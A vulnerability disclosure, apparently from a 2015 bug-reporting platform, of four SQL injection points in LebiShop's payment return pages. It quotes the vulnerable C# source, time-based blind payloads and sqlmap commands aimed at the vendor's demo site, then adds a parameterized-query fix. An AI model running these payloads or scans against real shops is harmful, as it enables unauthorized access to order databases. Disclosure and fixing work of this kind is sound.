2015-03-05: Details reported to the vendor, awaiting vendor handling
2015-03-10: Vendor actively ignored the vulnerability; details opened to third-party security partners
2015-05-04: Details disclosed to core white hats and relevant domain experts
2015-05-14: Details disclosed to regular white hats
2015-05-24: Details disclosed to intern white hats
2015-06-08: Details disclosed to the public
LebiShop e-commerce system, latest version: SQL injection (part 2), four locations, demonstrated on the official demo. Current version: V3.2.00. Update date: 2015-01-27
Injection 1: the source of LebiShop\onlinepay\dinpay\return_url.aspx is as follows
    protected void Page_Load(object sender, EventArgs e)
    {
        string str = base.Request.Form["merchant_code"].ToString().Trim();
        string str2 = base.Request.Form["notify_type"].ToString().Trim();
        string str3 = base.Request.Form["notify_id"].ToString().Trim();
        base.Request.Form["interface_version"].ToString().Trim();
        base.Request.Form["sign_type"].ToString().Trim();
        string str4 = base.Request.Form["sign"].ToString().Trim();
        string code = base.Request.Form["order_no"].ToString().Trim(); // not sanitized
        string str6 = base.Request.Form["order_time"].ToString().Trim();
        string str7 = base.Request.Form["order_amount"].ToString().Trim();
        string str8 = base.Request.Form["extra_return_param"].ToString().Trim();
        string outcode = base.Request.Form["trade_no"].ToString().Trim();
        string str10 = base.Request.Form["trade_time"].ToString().Trim();
        string str11 = base.Request.Form["trade_status"].ToString().Trim();
        string str12 = base.Request.Form["bank_seq_no"];
        string str13 = "";
        if ((str12 != null) && (str12 != ""))
        {
            str13 = str13 + "bank_seq_no=" + str12.ToString().Trim() + "&";
        }
        if ((str8 != null) && (str8 != ""))
        {
            str13 = str13 + "extra_return_param=" + str8 + "&";
        }
        str13 = (str13 + "interface_version=V3.0&") + "merchant_code=" + str + "&";
        if ((str3 != null) && (str3 != ""))
        {
            str13 = str13 + "notify_id=" + str3 + "&notify_type=" + str2 + "&";
        }
        str13 = ((((str13 + "order_amount=" + str7 + "&") + "order_no=" + code + "&") + "order_time=" + str6 + "&") + "trade_no=" + outcode + "&") + "trade_status=" + str11 + "&";
        if ((str10 != null) && (str10 != ""))
        {
            str13 = str13 + "trade_time=" + str10 + "&";
        }
        Lebi_OnlinePay onlinePay = Money.GetOnlinePay(code); // follow this call
        if (onlinePay == null)
        {
            base.Response.Write("系统错误");
            base.Response.End();
        }
        // (remainder of the method elided in the original)
    public static Lebi_OnlinePay GetOnlinePay(string code)
    {
        // code is not sanitized: it is concatenated straight into the WHERE clause, so it is injectable
        return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'"));
    }
Injections 2, 3 and 4
LebiShop\onlinepay\alipayDBJY\return_url.aspx
LebiShop\onlinepay\alipayJSDZ\return_url.aspx
LebiShop\onlinepay\alipaySJK\return_url.aspx
The code is identical in all three:
    protected void Page_Load(object sender, EventArgs e)
    {
        SortedDictionary<string, string> requestGet = this.GetRequestGet();
        string ordercode = base.Request.QueryString["out_trade_no"]; // not sanitized
        Lebi_Order model = B_Lebi_Order.GetModel("Code='" + ordercode + "'"); // follow this call
        if (model == null)
        {
            base.Response.Write("系统错误");
            base.Response.End();
        }
        else if (requestGet.Count > 0)
        {
            Notify notify = new Notify(model);
            if (notify.Verify(requestGet, base.Request.QueryString["notify_id"], base.Request.QueryString["sign"]))
            {
                string outcode = base.Request.QueryString["trade_no"];
                string text1 = base.Request.QueryString["trade_status"];
                if (base.Request.QueryString["trade_status"] == "WAIT_SELLER_SEND_GOODS")
                {
                    Order.OnlinePaySuccess(ordercode, outcode, true);
                }
                else
                {
                    base.Response.Write("trade_status=" + base.Request.QueryString["trade_status"]);
                }
                base.Response.Write("验证成功<br />");
            }
            else
            {
                base.Response.Write("验证失败");
            }
        }
    }

    public Lebi_Order GetModel(string strWhere)
    {
        if (strWhere.IndexOf("lbsql{") > 0)
        {
            SQLPara para = new SQLPara(strWhere, "", "");
            return this.GetModel(para);
        }
        StringBuilder builder = new StringBuilder();
        builder.Append("select top 1 * from [Lebi_Order] ");
        builder.Append(" where " + strWhere); // strWhere is appended as-is, unsanitized: injectable
        Lebi_Order order = new Lebi_Order();
        DataSet set = SqlUtils.SqlUtilsInstance.TextExecuteDataset(builder.ToString());
        if (set.Tables[0].Rows.Count <= 0)
        {
            return null;
        }
        // (remainder of the method elided in the original)
    }
Location 1
http://demo.lebi.cn/onlinepay/dinpay/return_url.aspx
POST the following two bodies in turn:
merchant_code=1&notify_type=1&notify_id=1&interface_version=1&sign_type=1&sign=1&order_time=1&order_amount=1&extra_return_param=1&trade_no=1&trade_time=1&trade_status=1&order_no=1
merchant_code=1&notify_type=1&notify_id=1&interface_version=1&sign_type=1&sign=1&order_time=1&order_amount=1&extra_return_param=1&trade_no=1&trade_time=1&trade_status=1&order_no=1';waitfor delay '0:0:5';--
There is a clear time difference between the two responses, i.e. time-based blind injection. Scanning with sqlmap:
sqlmap -u "http://demo.lebi.cn/onlinepay/dinpay/return_url.aspx" --data "merchant_code=1&notify_type=1&notify_id=1&interface_version=1&sign_type=1&sign=1&order_time=1&order_amount=1&extra_return_param=1&trade_no=1&trade_time=1&trade_status=1&order_no=1" -p "order_no" --dbms "mssql" --technique=T --current-db --time-sec 10
For injections 2, 3 and 4, visit respectively:
http://demo.lebi.cn/onlinepay/alipayDBJY/return_url.aspx
http://demo.lebi.cn/onlinepay/alipayJSDZ/return_url.aspx
http://demo.lebi.cn/onlinepay/alipaySJK/return_url.aspx
POST the following two bodies in turn:
out_trade_no=1
out_trade_no=1';waitfor delay '0:0:5';--
An obvious time difference: time-based injection. Scanning with sqlmap:
sqlmap -u "http://demo.lebi.cn/onlinepay/alipaySJK/return_url.aspx" --data "out_trade_no=1" --dbms "mssql" --technique=T --time-sec 10 --current-db
Fix suggestion: sanitize the parameters before they reach the query.
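The root cause in all four locations is the same: the order code from the request is concatenated into the WHERE clause of GetModel. The following is an added example of the hardened lookup, written for this write-up and not taken from LebiShop's code base; it assumes System.Data.SqlClient, a placeholder connection string, the [Lebi_Order] table and [Code] column named in the report, and an assumed allow-list format for order codes (alphanumeric, dash and underscore, at most 32 characters), which should be adjusted to the real format.

```csharp
// Added example, not LebiShop's code: look up an order by its code with a
// parameterized query instead of concatenating the value into SQL text.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

public static class OrderRepository
{
    // Assumption: the real application supplies its own connection string.
    private const string ConnectionString =
        "Server=PLACEHOLDER;Database=PLACEHOLDER;Integrated Security=true;";

    // Assumption: order codes are short tokens of letters, digits, '-' and '_'.
    // Rejecting anything else is defence in depth; the parameter below is the real fix.
    private static readonly Regex OrderCodePattern =
        new Regex(@"^[A-Za-z0-9_-]{1,32}$", RegexOptions.Compiled);

    public static bool IsValidOrderCode(string code)
    {
        return code != null && OrderCodePattern.IsMatch(code);
    }

    // Vulnerable pattern from the report, shown for contrast (do not use):
    //   GetModel("Code='" + code + "'")   -> a quote in `code` rewrites the query.
    //
    // Hardened version: the value travels as a typed parameter and is never
    // interpreted as SQL, so "';waitfor delay ..." is just an unmatched string.
    public static DataRow GetOrderByCode(string code)
    {
        if (!IsValidOrderCode(code))
        {
            // Malformed input is treated like an unknown order, same as the
            // original "model == null" branch, without touching the database.
            return null;
        }

        const string sql = "SELECT TOP 1 * FROM [Lebi_Order] WHERE [Code] = @code";

        using (var conn = new SqlConnection(ConnectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@code", SqlDbType.NVarChar, 32).Value = code;
            cmd.CommandTimeout = 5; // bound query time for the callback handler

            var table = new DataTable();
            using (var adapter = new SqlDataAdapter(cmd))
            {
                conn.Open();
                adapter.Fill(table);
            }
            return table.Rows.Count > 0 ? table.Rows[0] : null;
        }
    }
}
```

In the dinpay handler the same call replaces Money.GetOnlinePay(code) on the untrusted order_no value, and in the three Alipay handlers it replaces B_Lebi_Order.GetModel("Code='" + ordercode + "'"). Because every caller of GetModel(string strWhere) passes a hand-built WHERE fragment, the durable fix is to remove that overload entirely and expose only typed lookups like the one above, so that no future call site can reintroduce the concatenation.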
Hazard level: no impact (vendor ignored)
Ignored at: 2015-06-08 11:15
Vendor response: none